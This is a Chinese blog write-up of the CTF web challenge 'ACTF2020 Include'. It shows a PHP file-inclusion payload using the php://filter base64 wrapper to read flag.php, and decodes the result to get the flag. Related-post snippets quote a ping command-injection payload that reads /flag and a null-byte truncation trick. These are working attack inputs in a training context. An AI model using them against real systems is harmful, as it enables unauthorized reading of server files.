[ACTF2020 新生赛]Include wp

素影·流年

已于 2022-05-29 23:16:59 修改

阅读量135

点赞数

分类专栏： CTF 文章标签： php web安全

于 2022-05-28 12:56:20 首次发布

本文链接：https://blog.csdn.net/Brain_Gym/article/details/125012238

版权

CTF 专栏收录该内容

4 篇文章 0 订阅

订阅专栏

题目链接

考点分析

本题主要考查了利用php://filter伪协议进行文件包含

知识链接

https://segmentfault.com/a/1190000018991087
https://blog.csdn.net/nzjdsds/article/details/82461043

解题步骤

(1) 进入网站点击 Tip 网址跳转至

...?file=flag.php进入正题

(2) 考虑 "php://input"伪协议 + POST发送PHP代码的经典套路

构造payload: ?file=php://input

(3) 重新考虑之后使用 “php://filter"伪协议” 来进行包含。当它与包含函数结合时，php://filter流会被当作php文件执行。所以我们一般对其进行编码，阻止其不执行。从而导致任意文件读取。

构造payload: ?file=php://filter/read=convert.base64-encode/resource=flag.php
这里需要注意的是使用php://filter伪协议进行文件包含时，需要加上read=convert.base64-encode来对文件内容进行编码
得到返回值

PD9waHAKZWNobyAiQ2FuIHlvdSBmaW5kIG91dCB0aGUgZmxhZz8iOwovL2ZsYWd7MThmMzIzYWEtNmQxNi00Nzk2LWE0OGItNWMwMzA4ZmMzMTVifQo=

(4) Base64 解码得到flag

<?php
echo "Can you find out the flag?";
//flag{18f323aa-6d16-4796-a48b-5c0308fc315b}

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

素影·流年

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

【网络安全 | CTF】攻防世界 Web_php_include【php伪协议|data伪协议|file伪协议】

等风来

05-22

1万+

是 PHP 语言中一个重要的文件包含机制，可以将一个 PHP 文件包含到另一个 PHP 脚本文件中。该机制通常用于代码复用和模块化开发，在不同的 PHP 文件之间实现函数和类等代码的共享。file 伪协议用于访问本地文件系统中的文件，可以在 web 页面中链接到本地文件，或者读取本地文件中的数据。PHP 伪协议是一种特殊的 URI 协议，可以绕过通常的协议限制，直接访问本地文件和执行 PHP 代码。函数，该函数返回当前工作目录的绝对路径。函数，该函数返回当前执行的 PHP 脚本所在位置的绝对路径。

[ACTF2020 新生赛]Web汇总

brainw的博客

04-21

1145

[ACTF2020 新生赛]Web汇总 Exec ping命令注入 ‘127.0.0.1;’’ 没有回显截断符号配合普通命令发现没有任何屏蔽 payload： 127.0.0.1;cat /flag 拓展：https://blog.csdn.net/qq_41079177/article/details/88321816 Include 根据题目和询问可能是本地文件包含通过 ph...

参与评论您还未登录，请先登录后发表或查看评论

[ACTF2020 新生赛]Include

rang的博客

10-18

290

点击tips Can you find out the flag?源代码也看不到有用的东西上burp 无解现在考虑 “php://input"伪协议 + POST发送PHP代码的经典套路发现php://input被过滤 php://filter"伪协议” 来进行包含。当它与包含函数结合时，php://filter流会被当作php文件执行。所以我们一般对其进行编码，阻止其不执行。从而导致任意文件读取。构造Payload: ?file=php://filter/read=convert.bas.

PHP漏洞之文件包含漏洞

dogeace的博客

11-28

1842

在php语言中存在着下面几个函数存在文件包含的的功能，这些函数的本意是方便开发者及用户实现某些功能，但是如果不对文件包含的内容进行严格的的限定，会被攻击者恶意利用。这就是php的文件包含漏洞。下面有四个函数可以实现文件包含分别是： 1.include（）；用此函数包含的时候，如果出现错误，会提出警告，跳过此步骤继续执行剩下的代码。 2.require（）；此函数文件包含出现错误的时候，终止程序的运行，与include（）区别就是这里。 3.include_once()与1的唯一区别是文件只被包含一次，避免文

PHP文件包含(include)致命漏洞

创业的程序员

12-29

1555

<br />假如你的网站目录下有个这样的文件：<?php$file=$_GET['f'];$file=str_replace(".","",$file);include($file.".jpg");你会觉得存在致命漏洞么，比如我想让最后一句变成 include(test.php);你觉得有可能吗？其实很简单，除了.用于标识文件扩展名之外，还可以用 “,地址栏输入 ?f=test”php%00 就可以达到目的了，%00是ascii码为0的字符，在这里会产生截断，而 test”php，被include当成了te

BUUCTF [ACTF2020 新生赛]Include1-WP

qq_36348811的博客

04-08

276

目录问题分析问题分析打开题目就只有一个tips 点进去发现有一段文字，Can you find out the flag? 查看网页源码也没有特殊的提示。但是当前的url中有出现?file=flag.php，首先尝试用“php://input”(php://文档)，发现题目过滤了“php://input”伪协议。所以考虑使用“php://filter”伪协议来构造payload: http://d31d5535-34a3-424a-8bc5-77fc572ff5a6.node3.bu

BUUCTF Reverse/[ACTF新生赛2020]Oruga

ookami6497的博客

07-27

637

BUUCTF Reverse/[ACTF新生赛2020]Oruga 先看文件信息：没有加壳 IDA64位打开，分析代码 __int64 __fastcall main(int a1, char **a2, char **a3) { __int64 result; // rax int i; // [rsp+0h] [rbp-40h] char s1[6]; // [rsp+4h] [rbp-3Ch] BYREF char s2[6]; // [rsp+Ah] [rbp-36h]

CTF学习笔记——Include&Ping Ping Ping

Obs_cure的博客

09-20

1605

一、[ACTF2020 新生赛]Include 1.题目 2.解题步骤点进去看了一下根据题目猜测，应该是和php的文件包含漏洞有关…尝试了一下显示phpinfo，意料之中的失败了，看wp才了解到，这是一道伪协议的题目。然后翻了一下之前的博客，复制一下payload，成功解题。 ?file=php://filter/convert.base64-encode/resource=flag.php 3.总结第二次做伪协议的题，只能说经验不足，辨识出来，下次遇见类似这种访问文件的题目时可以尝试。

[CTF从0到1学习] BUUCTF WEB部分 wp（待完善）

qq_43710889的博客

11-27

4111

[CTF从0到1学习] BUUCTF WEB部分 wp（待完善）文章目录[CTF从0到1学习] BUUCTF WEB部分 wp（待完善）[HCTF 2018]WarmUp[极客大挑战 2019]EasySQL[极客大挑战 2019]Havefun[ACTF2020 新生赛]Include[强网杯 2019]随便注 [HCTF 2018]WarmUp 首先看看网页源码呗 <?php highlight_file(__FILE__); class emmm {

[buuctf] crypto全解——121-146（不建议直接抄flag）

热门推荐

ao52426055的博客

01-13

1万+

[BJDCTF2020]编码与调制查看题目曼彻斯特 6进制024A447B4469664D616E63686573746572636F64657D 通过解码16进制即可得到flag{DifManchestercode} [网鼎杯 2020 青龙组]you_raise_me_up 查看题目 #!/usr/bin/env python # -*- coding: utf-8 -*- from Crypto.Util.number import * import random n = 2 ** 512 m

PHP include 漏洞扫描器

06-05

PHP包含漏洞扫描器的源代码,horse_b制作,多线程的好例子下载可以到www.horseb.org的"原创源码"里下载

[ACTF2020 新生赛]Include(php伪协议)

weixin_45253573的博客

11-10

401

打开环境点击tips，跳转到了新路径http://0c736741-f9fd-46ea-8c45-b7f0712e099b.node3.buuoj.cn/?file=flag.php 由?file还有flag.php 考虑使用php伪协议读取文件 payload: ?file=php://filter/convert.base64-encode/resource=flag.php 完整payload： http://0c736741-f9fd-46ea-8c45-b7f0712e099b.node3.b

ACTF2020 新生赛 -- WP

会下雪的晴天

05-18

3182

做题思路记录，同时感谢赵师傅和Y1NG的环境与源码文章目录[ACTF2020 新生赛]Include[ACTF2020 新生赛]Exec[ACTF2020 新生赛]BackupFile[ACTF2020 新生赛]Upload [ACTF2020 新生赛]Include 主页显示是一个链接，点进去看看，URL出现file=，结合题目判断为文件包含用伪协议读flag.php，一般语句为php://filter/read=convert.base64-encode/resource=xxx php:/.

如何对PHP程序中的常见漏洞进行攻击

翔一的垃圾桶

11-30

626

原著：Shaun Clowes ; " target=_blank>http://www.securereality.com.au/>; 翻译：analysist ; " target=_blank>http://www.nsfocus.com/>; 之所以翻译这篇文章，是因为目前关于CGI安全性的文章都是拿Perl作为例子，而专门介绍ASP，PHP或者JSP安全性的文章则很少。Shaun

include文件包含伪协议

weixin_62575261的博客

04-10

676

虽然学习了php的include文件包含基础，但是在实际的ctf题目中还是没有能够很好的运用，因此在本文写下在ctf中会用到的绕过方式部分内容来源于https://www.csdn.net/tags/NtzacgzsODM1MDAtYmxvZwO0O0OO0O0O.html 首先是ctf-show萌新web题目14 题目过滤掉了很多元素，但是题目又提示了我们flag就在config.php文件里看了很多大佬的做法，他们大部分是运用include文件包含来完成的通过大佬的解释，这paylo

php文件包含漏洞详解

[ACTF2020 新生赛]Include wp

考点分析

知识链接

解题步骤

(1) 进入网站 点击 Tip 网址跳转至

(2) 考虑 "php://input"伪协议 + POST发送PHP代码 的经典套路

(3) 重新考虑之后使用 “php://filter"伪协议” 来进行包含。当它与包含函数结合时，php://filter流会被当作php文件执行。所以我们一般对其进行编码，阻止其不执行。从而导致任意文件读取。

(4) Base64 解码 得到flag

(1) 进入网站点击 Tip 网址跳转至

(2) 考虑 "php://input"伪协议 + POST发送PHP代码的经典套路

(4) Base64 解码得到flag